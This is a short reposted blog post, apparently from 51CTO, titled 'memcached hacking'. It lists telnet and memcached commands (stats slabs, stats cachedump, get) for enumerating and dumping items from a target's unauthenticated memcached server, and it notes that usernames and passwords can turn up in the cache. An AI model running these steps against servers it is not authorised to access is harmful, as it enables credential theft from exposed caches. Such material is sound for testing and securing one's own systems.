memcached hacking

简介:

1,Test:

telnet target port

stats:check the information

set pnig0s 0 0 10

pnig0s1992

get pnig0s

if echo "stored" then it works well.

stats slabs:lis all slabs of this memcached sever.

stats detail on:make the memcached listed all details of each slab.

stats cachedump [slab's ID] [echo amount]

now,u got the name of items,u can use get [name] to check it.

username & password sometimes can be found in the cache.good luck!












本文转hackfreer51CTO博客,原文链接:http://blog.51cto.com/pnig0s1992/605299,如需转载请自行联系原作者

相关文章
|
8月前
|
NoSQL Linux PHP
php添加redis扩展 linux和windos图文详解 l
php添加redis扩展 linux和windos图文详解 l
49 0
|
存储 负载均衡 NoSQL
Memcached 和 Msm|学习笔记
快速学习 Memcached 和 Msm
Memcached 和 Msm|学习笔记
|
存储 缓存 网络协议
|
存储 NoSQL Java
|
SQL 存储 NoSQL
|
监控 关系型数据库 MySQL
|
关系型数据库 MySQL 应用服务中间件